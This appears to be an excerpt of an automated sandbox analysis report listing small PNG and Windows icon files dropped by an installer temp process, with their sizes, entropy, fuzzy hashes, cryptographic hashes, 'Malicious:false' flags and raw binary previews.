                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):946
                                                                                                                                                                                                                                                          Entropy (8bit):7.732040020903732
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Md+AhCq2Ci1b9Hm4UEtkvfdjXxYoCa0jn5/Pt1hC5VbxePpNS/XnxQmHm3EZ:hwRUEtWzxvC1RPpC5Vd4NS/Xnxjnn
                                                                                                                                                                                                                                                          MD5:2F8627CE7D0210CE8A83A237AC9E7FFB
                                                                                                                                                                                                                                                          SHA1:1F7C014538E93EDF5EAB0721AB007C946EDE8130
                                                                                                                                                                                                                                                          SHA-256:CD701C56968BF7138417063032D62ADAFC272C8C6FC98D527AEA342359DA0F7D
                                                                                                                                                                                                                                                          SHA-512:CCDA7916E676BA730D0FE9F803E9CFFF37BEED65B9DA776DA6113B33A75ED351E699D9923B68D37AD83BA04A123815A160E53F24840DF73580802AA510BFF81F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...yIDATx.mSmlSU.~.mo..s...].I[....2..]*c..($K.D...1.jP....2...HH4.D...3!.c..c...l...M...]........u?..{sN.7'O....!......N.d'mP.4.kf#.L*...N..J......H.,...F..$ ..._. .".B.B.dO.....?.7.?...]Q`...f.-. ).22..,.,W.x..f.X....l>z....{...I..`<b.....4,U5..[.U.KSq,f.H&.{g....2...#.Pt)....aJ.g...[?...{@<.<L.....m...3n..oG..d.\_{.h..=...>L...NC.v..#.h...cu..........%l{...a(c.H./..h}.h.v_13U..5...b....I....W.e.Y.?.-...h....-..M..y8....'.._b..#E/.Q...'<.8.n. I.O$...^.C..8.Z3n...XM....................V3..c..6.@V..P`...=LNL.6.....(l...)A...-S...c."...|...N....;}J. ...Q...2h.....tt...R....~z.I(.._.L....z?Z.jd...$I.@D!..-....G..0iA))Y..k.r.n.H.S!...m.*.:j.p:..-[... ......_........).UL#7...?9.l$..Q.V.6.".N.^...k,6.1.CZ.".....!....";.....e..e.]..VV..^Rb...&c.UW...f-m1.tn..2..*...`....Y........B.f.e.......`.k*.z..".......W q.U."dZJW.3o.'.u...?..O........m V.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.275771912287761
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:INtkHVr7SidRa/Obkfbw8H1y3LIseAevOGZ0bTsB:LVPS0a2AfjeIEeBZ0bTsB
                                                                                                                                                                                                                                                          MD5:6A4FEA20675B423DC5B6AFC565BA2D57
                                                                                                                                                                                                                                                          SHA1:D241A8C16A86789F1B28EAA58B164AE6C9457FC1
                                                                                                                                                                                                                                                          SHA-256:73EC225A303B4A44537CBBCFEB5FC07BB8EEB9FDFE0FACA788309CC7C75F3F74
                                                                                                                                                                                                                                                          SHA-512:2948886496B704F85A71549341A1D8E5DE36375CCC6FF79B0F95BB6FC755147DE35C6F556E02CFF916B5967F95891E1586F065DC329A68E057093032B485A4A0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................................K.}.s......(...)........w...H.....!... .................W.#.n..&...<...M...i...k...[...C...+....q...K./.............W.#.u..*...A...>...'...*...5~..&...;...G...2....x...V.,.........l.."...>...'...!T..-(..BA..MN..>=..)4..%...D...+....r.......[.j..../...5....J.."...("..63..=;..40..' ..!)../...8........p..p..$...8...+~....f.....$...)"..,&..(!..$........K..:...*....v...}......>... F....4...d.......................\..+`.9...3........~..3...C...Ni......................................7...8........~..2...E...?d..z...............................f...9...9........}..0...L...Y...]...]...`...c...c...`...\...]...Y...N...8........r..1...U...\..._...v....xs.....}..........._...^...W...8....y...b.u....R...W...f........LA..........LA.....g...Z...V... ....w......r..*...^...m...........................p...a.../....z..'........W.#.w..-...x...........................|...1....z.....M.............W.#.s..&...k...................o.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):1.0136328376606665
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:A555L5rr5r5r5r5Lr5L5r5L5L5555555L5556DGkD7GPMg:CiGEg
                                                                                                                                                                                                                                                          MD5:D71543D4396E09496F7724F2EB51819D
                                                                                                                                                                                                                                                          SHA1:8C60CABA094161202D8FCBF5E787E83E586A73D5
                                                                                                                                                                                                                                                          SHA-256:52440F7AC22968C6FB7AB07ECB382F8F047B4EB3989843BF5F396B965F2BECFE
                                                                                                                                                                                                                                                          SHA-512:1A6A95B7FDD731F6CFB55F62DB567DD4EC162872081B8B19DF9BDE1530765FB4ED683959B43E73C1E222389EFEA7554401188B4AE0D65ED3BAE4CD124C21A982
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.739434322498255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:iStQidpNKcrw3FGbVzh8MgzemLqu+kqkng6dPEAaRAdViNSOC09YzmLk:i4xuNYBzh8MkeZLRkng6q/RWmSDKYzR
                                                                                                                                                                                                                                                          MD5:5782C8F6C70B8E884FCB822EEF286EBE
                                                                                                                                                                                                                                                          SHA1:66776EDD49D55F0F440FD5DCCF38FC27147076C2
                                                                                                                                                                                                                                                          SHA-256:C067BD4E1DDB1EDA87201D7BA65BEB416C56A9ED486D17454148E9A013A6BD32
                                                                                                                                                                                                                                                          SHA-512:70366DDABF05D4A60C6AE09266A4911CE61268DE7C3E83292A627344AC048A1510F46B48A566790B986AB1264E3FF38FBCC552A3E60A9249D7F1D12E44657CBD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .....................................................................................................................................................................),).....)().)()R....................................................),)JJMJ.kmk.)().989.................................................!$!.\Y\...101.kmk.....................................! !B!$!.)().wxw.........sqs.kik.RUR{9<9!................)()!!$!.RQR.................................cec.BEB.989.....),).)()................................................989.9<9.!$!.................................................xzx.{y{.)().),).........................................................)().101.........................................................)().),).........................................................!$!.)()ckmk.................................................JIJ.)()J....),).............................................ZYZ.)()s............101{Z]Z...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):888
                                                                                                                                                                                                                                                          Entropy (8bit):7.7525569355376955
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MyC90RfzncoB9d+Jfty3DKiuhnS1nWXpvQTMmy5ZKr+NLQymmFT040q11aZ2:eJ6iDKNdanodwMmyvKr2+40q1UFWVt
                                                                                                                                                                                                                                                          MD5:D060EB33F8B5DFA18682625CE21C1F46
                                                                                                                                                                                                                                                          SHA1:DEC3B1DE06D2D855408C16D93365711088BBE705
                                                                                                                                                                                                                                                          SHA-256:F6C2720D108D96B429E82883EE44CE7EEC31F4194DA99391DC023D6797FA0886
                                                                                                                                                                                                                                                          SHA-512:BBBCDC3E03214E686DCB05094ADE3A9FFB510CB5BF4DAF28B607BC50349C1B675074AE7EF4DB99E86A00C661B31473D858353EB3DB8734639E8FF00B71AAEC6A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...?IDATx.m.[l.U..33...N.e..m..n.mS....$...Z.. .....K..>..D..`h.D....@..... .4B...,...-.,.......t5....s......;./.huC..]./.d.M.0.3t0....u'.../..o...n-.U.~<..OS.`.-.n..a0..9<..._@U......m..|....W..y.....g...;. J.e.C..s...5............./....i.".....6I..o...TF..#....=r`N.[.....>R.S..p.(...%.B.%....W{..-@....cr|....D~.CF..3...q5W...*....k....&..58..40I.+V.."....A.f...e 9^.l....6:.Q....Z..i9..;..6..-.....aX<..1Kqc:w.L.||.d K..V.....o8.6......qA...............;#.h........_I}..S..H.........$....`.A_R.\...r.D9.....fz|%g....,...N.......n^...v...v;8..(Y.[..P......P0...AB".Rf..vl.On..C.u.(.C..I....h9....\..t..c.c...Xr~...}..^z...(..m....[L)..g.8]......2....v.7.......R..;...^..B........F....k...%.o2.. .^=Q.!.......b..%....P.T.U<v....(..A..w...........M1M7.SS..6fS.mB%..7.....M5....A9.:'...Q^..j...Y.s-.\ |l......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):728
                                                                                                                                                                                                                                                          Entropy (8bit):7.626939687751021
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7xDWhiMwp8cPv8arNXzjOxin+3sSsNGI+dlb1TXiaG/deT7gYIaMXv3wjxyUU:mDmiMc8cPv8apjjOxA+3sDNGI+pyN/dH
                                                                                                                                                                                                                                                          MD5:19F3CB0BD386402E675788B7D56970F4
                                                                                                                                                                                                                                                          SHA1:EB8E440BC41C57BFEAA8E684C1E95008A3B53161
                                                                                                                                                                                                                                                          SHA-256:12EDB57B3DC1F4FC152FB9DC44E69E669182C36A543E3F9335B14E7BF9AA4787
                                                                                                                                                                                                                                                          SHA-512:030099A142FB428E231C9050304EA59BBFA9AF9E281FCFF0E80F3A2DA4113AA0953D0CD629B269310A47EC901279BB7C0FF5C2C922342AD813296832065022BF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..ML.Q....m....D..('...P...r.r1...1....... .^.b.1.?b...#z....&~..L(zP..F..nK..^.....L...7.....C.....y...;m!...!c.e...dUhf....&.^K.Ce.f.V........M..@a..R.k..&.....l:..E..W.H.0.....\8+LC..2..r....!........G18..\g...r...ca:!5....\)N.......77PVaF......q...p.....`..sI)....%.E.z.`.]...(5.?O.^.%....X...kLRz<.<.......jO...@..F\jP.g.....W...\.H.......:..:...l.&H....L.x7....-:JQ...{..e=..p..(..?.....R.P.8j.T.6....t..f.VC)|..3.g8..q..%.kn*....#S...........e.....r4_g()g....ER..?d..+i...Nc3U.B....)...#...q...j...g..U..0)P.S1VQ..R....q..t..C..$5R....~Y...Be....*.Y@j.....J...X. .y...6z..B...p.J.y...a..b...)....fb.t..7.@.6&...m..>/j........Z.......(f.U.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):486
                                                                                                                                                                                                                                                          Entropy (8bit):7.403940932243279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7H2DBCOIXU00QhP+CCTV44lVCcK8ajSR64+eg:C2MXURCCTCXcK8286Heg
                                                                                                                                                                                                                                                          MD5:49CBAB461388899937D45CE5F40FEA6F
                                                                                                                                                                                                                                                          SHA1:4333CFB198B2F8078D38159AE6F37CF2056AC6A9
                                                                                                                                                                                                                                                          SHA-256:30DBAE48834681F6F8E6A6867B5A83582DFBCA8E61C51C8A189687055F1A9042
                                                                                                                                                                                                                                                          SHA-512:5A0C295DC41860B4F650D82B43EFBB4F7369A7DCC6844F8837DA8708F531A4D4C17749152536219492ABAA5667FFC63C0547AB2BD257068CF9BCDD9C47492595
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..?K.P...3..?C.qi.T.E...,Up..kgg...b.......A.....8..."h...DDA.1...XJmKz..<...wo.... ....M..V.....o.2Q..e.#<`....E..l.....Y......m#..4...Fb2..D..Q7).K...b.i.....y...9`..^._Gv...a..T.j......1..D[.[...!}`.%....5........k...Y.....!z.u....\2!2....1 .H-.P\I)!......2B.!.[......`+....].F.1....F.I...(/..>}?.....v....w.C6C.H...E..w.v.S.q....?I...a......l<#~.....U....U.^.Q.( ~.G.thG/.....,R.).U.K?9.u.....*...g.*..L_..wt../.....2.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):542
                                                                                                                                                                                                                                                          Entropy (8bit):7.521572092864423
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7VDZbIJn0vRHCeQgHr8zLKMqUuwmUL27QyFY7:xN0vRHCej+m2bR27QyF6
                                                                                                                                                                                                                                                          MD5:686CF19C035D7BB3523CF7FDF3F39F13
                                                                                                                                                                                                                                                          SHA1:862BDC58F8EB03A07C866566FFCFA7228987899C
                                                                                                                                                                                                                                                          SHA-256:3FDF0CE404773A9703AC716DCA370D349A630E7A2098BE497D0C472CAE80C38B
                                                                                                                                                                                                                                                          SHA-512:7F8EF9F4D6D8AE5E6DAE76DDA7C8B389C3EC1DFE022FDA23790731272EEE7AD209CCD5890D3142B1C7F57D557A1A27202534A3085AD3A734071A898F1E0B6512
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.SMHTa.=w.....!...6-"B..MRB.Q.\.."..U..U.....F:3..X.M..G.t!..KI.T...w;..~.1......~..'...W..K..."n.W.q.....1........tB.G..........\.VE..E...q''.B/.D...\..j.#'~...T-G.c.*..(..&.DZ.N.+GT.o...~.s..(*..g..K..."...t..60..X...fv....~.F.).....H...nv..)...y.`~U......4.....0.]5..l..+..eT7.C....$..u:A...d.....`..%..../.......dh-..?..&.....(....O.)u......$..a.^..A..."Dwk_1...U ...,.i..A.T....3D..._.Z...l$1..p.....A+_l..`.=R..d6.T...K..OSL..f..nu_...g...S.3.L....r........g.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):1.0136328376606665
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:A555L5rr5r5r5r5Lr5L5r5L5L5555555L5556DGkD7GPMg:CiGEg
                                                                                                                                                                                                                                                          MD5:D71543D4396E09496F7724F2EB51819D
                                                                                                                                                                                                                                                          SHA1:8C60CABA094161202D8FCBF5E787E83E586A73D5
                                                                                                                                                                                                                                                          SHA-256:52440F7AC22968C6FB7AB07ECB382F8F047B4EB3989843BF5F396B965F2BECFE
                                                                                                                                                                                                                                                          SHA-512:1A6A95B7FDD731F6CFB55F62DB567DD4EC162872081B8B19DF9BDE1530765FB4ED683959B43E73C1E222389EFEA7554401188B4AE0D65ED3BAE4CD124C21A982
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):318
                                                                                                                                                                                                                                                          Entropy (8bit):6.697181871409298
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+aWg7NSRAkPY+kW37wjNaI79UL00H3zSiw2p:6v/78/2VRZbW37wV9UL00N
                                                                                                                                                                                                                                                          MD5:E472E7B1F2BF2829B8625C32CB02B0A8
                                                                                                                                                                                                                                                          SHA1:49275242752EEC7DFB1ED14A2968F02439EAE54D
                                                                                                                                                                                                                                                          SHA-256:FA0F63928ABF3B36BE9D310A257CABD413B7E7B7D7D92A0975C7FAA7CB2F370E
                                                                                                                                                                                                                                                          SHA-512:02E865BF6802EF4B3851E87A3E0C984395D5A90FFD7C6282F858E8ED2A74769BD968C637ABCC710BE3290CD0D947FBC5620FBA3510CB3ABB29991278F20C44B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.134.[z....IDAT8O....P...J...@ ... ....Hv.@v.D%........`....M^.=Mh8.4.{i.6....8...m.c@.....a..q...l...'..c...R.Aas.qJg1.......;1.....~.....b.....{u.dt...^.....`..:72..Ru'..2..4_......].....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.614804652904851
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Biiii8ibi0TiSDiiuYxId1diiiiSiiiwKrkIzpJi4arAJbJbJbJbJDg:Biiii8ibiaiSDiiTxIfdiiiiSiiiwKr2
                                                                                                                                                                                                                                                          MD5:92E919F7716BFEC2191169F9D1513737
                                                                                                                                                                                                                                                          SHA1:E7BEB2821E116084C0A516D754A0C7A534956BD6
                                                                                                                                                                                                                                                          SHA-256:C5CB556AFCF8E5F48AA604646FFE93AEDE2607342C4AA93D70791ED8C4FFFE4B
                                                                                                                                                                                                                                                          SHA-512:574F731D0220B353AEAC4B442E6ADED51CE54A7BE93BF3EFC3A7EB8F15161FAA3A1806C859C585ACCC351195AA0376608A5ED5B126DD552296D2305367008014
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................|||.|||.|||.|||.|||.|||.............................|||.|||.|||.........................|||.|||.|||.................|||.....|||.......=...$..Y...Q......|||.....|||.........|||.|||.|||.....|||.......T...7..n ..`%.....|||.....|||.|||.|||.|||.............|||...../.n...J...(..g'.....|||.............|||.|||.....|||.....|||..........a...,..u(.....|||.....|||.....|||.|||.............|||.....{....Z...3..z*.....|||.............|||.|||.|||.|||.|||.|||.........................|||.|||.|||.|||.|||.................|||.....'.U...A..t3..o:.....|||.................................|||.......Y...7..q...\".....|||.................................|||.....{....\...-..r&.....|||.................................|||.....o.~...^.-.C.=.>.....|||.................................|||.........................|||.....................................|||.....|||.}}}.|||.|||.........................................|||.....|||...........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):488
                                                                                                                                                                                                                                                          Entropy (8bit):7.3920224953533245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7drHlKbwPKM5RMujiE9hN+clw+798b7w6sJ:orHkbwSwMujiE1+V+JukJ
                                                                                                                                                                                                                                                          MD5:694A53E27D606EC219A2701C6DD6926C
                                                                                                                                                                                                                                                          SHA1:E2EF3DA049160DB18AC5AC2D770B3F05F219722A
                                                                                                                                                                                                                                                          SHA-256:0AD6EB5F37D593E9096640D5C0440D108BE85DCBB0C726CB5E0C8802E1B3421B
                                                                                                                                                                                                                                                          SHA-512:B246D42344E90922EFCCFAB836BADC30DBA8E370BEE29E03524B0310FCDC9FEB727BEF32EDB695DD42B72FC99543520B91D8179A83ECC479C709DB9077861216
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..K.a....[J..............D.4...I...Q8.iT.......D$-EC.%G.IP....R+.....4.{....s<......-....!.#H=..p........r*....!...z=l6....o.8..$.T*}...........N'...\....e.3...C8.n..3..R..-y.....j0cX.x.o...4...#!>!u...X..".....V+.!..<#{E.R.aj....J...,,....O.N..8O.C"... ..6R.l6.7B.....9..%.{*.b.L..C.ET..v.=....P..x'.....V.*s.V...A<w...9...\....T..E...|...d;`....,G..O..#i..PD6.....5....n....4..<2.4......`.../S..u.>..;._........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.042561065627236
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Fw3//////oXgAo////////go/P/wK/////YTQRY9K///pLKe//v7WVh5y//ze2JW:7BQC9BDRClcc3TIVBw0CC/6upx8y/V
                                                                                                                                                                                                                                                          MD5:58BB5428EE336A048C0EAEDD11B08CBE
                                                                                                                                                                                                                                                          SHA1:E40B41DCE19B4CEE84943905ACC31F0B624A22DC
                                                                                                                                                                                                                                                          SHA-256:619AB6CC1EB6D48676BA555BFEC94798B8E043052967FAD42356E9D8BFCD08D9
                                                                                                                                                                                                                                                          SHA-512:1424FE21796F05B1BB963F857BE61BD805775BC5F56B1A5ADBA8372057AEAFE01ED559EE9F29212BB74D9A1BF90F4F44DCC27AE09D1A02A674094BF8D7FA2045
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................................................................................................../............../......................................................./.............._.............................................._................/...........................................................................................O...........`...P...........o...........................0...... .........O...................0...................."...a..............p......................................................................./....+..1...q..............X..1..1..1..1..(............(...H...H.............H...H..........j...H................Z...`...`...j...........................s...M................p...w...w...w.........................`......`.............P...............|.........s...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):563
                                                                                                                                                                                                                                                          Entropy (8bit):7.517174524579319
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7w//AIiO/vrFWdRdGBvXRwnHbMwigmsA7F9fS6ofSZHRQX+K:FB/vrEDdGh0ig8zKzSFk+K
                                                                                                                                                                                                                                                          MD5:DB972EE37A5D0AEF2AEA2FE741B82C1D
                                                                                                                                                                                                                                                          SHA1:C286B9CFEDA3CB6D3E19E1D7747790C52D84D377
                                                                                                                                                                                                                                                          SHA-256:6A09E141A38F22AF46750BA3186AB260B0C566DDCA209B083623D8305BDF14A2
                                                                                                                                                                                                                                                          SHA-512:9F35E67F88A4A250F8F983C8273DFD76F07A8CEEFBF54BA97D73FD1AB4C62508D8999AACD204E73CD04B86A0556AF895CA4BC07A722FB3D6143B7B07FF20BFF6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx...O.A...v...aU<..b.@.F8y!..;.J ..{.w)^ML..../-..0!....GBS.=...v.......v...If.....;.......}.9...k......Q[...YV.........y|.I\....QUb.....^ HN.....F.y...0r#.d...+.>.`.".....|....:b..sB.xq..~..]$(U.G....M.;?]|.....0..I.$|..7.xz.@....R-......../.....,7C.%.<.".....0N.|. ........[UU]....0....=.f.2........G...C..p.. ....h...(...r...dR.I.]..h{.d...z~......s_.(U|..(<J ._.<.+.#,.su3.^.Q&.....ir.j.V....E}...C>.o.m...A..;......E..C./..J...!..I.*....8ij...W._.@;..[.....O.......-V.xD8.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.568471936906983
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:EsvbDZdGE4mTfyxt6fSgSgd7+WmhOXYvTTT5:jH8mm6KXkSW1OTTT5
                                                                                                                                                                                                                                                          MD5:60EEE3F506D7E7F1A87845F441D2FB09
                                                                                                                                                                                                                                                          SHA1:E3D9A990606A52FB057237EB1F1435605CDDF360
                                                                                                                                                                                                                                                          SHA-256:E4C99A376C5625C022A1CEE0422382E58516350B5602779286131579DDBFD108
                                                                                                                                                                                                                                                          SHA-512:54CE729C0033D0E3C5ABF33D0F67BC5E9032A4374CC274E978F1129AE44276D6AE58B83DCE6CCFE72CA3681B3F3BEB6FDB0928843D6246180AACF50A2BDED936
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................................KKK)...i...........iKKK)................................\\\/..............................\\\/....................|||J........................................~~~I............\\\/................Z....s..w.......................\\\/........................r..Z...._..~...\..........................QQQ).................r..Z...._..............................QQQ)...i........Z....U...{..Z....g..{..............................i............n...y.......q..........n...g...g...y..............................p...p...x.....................}...............i.........6...6...6...6......p.}........\.}.............hQQQ)..........................g.}.....................QQQ).........................h......h.}.............................^^^..................6......y.}..................eee+...............H.......................................H....................^^^..........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                                                          Entropy (8bit):7.696472050125109
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MV8c2Qwrnehd6jw2pCreHWZJl2TKpwsC/eYvbojK1YOfjypI2Sc6jisxYw3Y:ycajeH61peeHauKVOFvbp7gb65Xm1
                                                                                                                                                                                                                                                          MD5:27858239558F8642F02A7770829F8325
                                                                                                                                                                                                                                                          SHA1:13BA5FC4427044C1343D62F4F9D552C6C62B18B6
                                                                                                                                                                                                                                                          SHA-256:C470C09448A1BFBDD59F53A6E4C563E9584FF8CA083895A4887ABBAA39EDB823
                                                                                                                                                                                                                                                          SHA-512:4E0A4AC0E33EA15BC546D56D552A3C1A8995DF8D319418D6E6CA066FC25CA8EB9E9A77F1373D4A7236BE1F5B0FE0DFEE9D62F3F559CFE3C0B2311FC0C830EA45
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
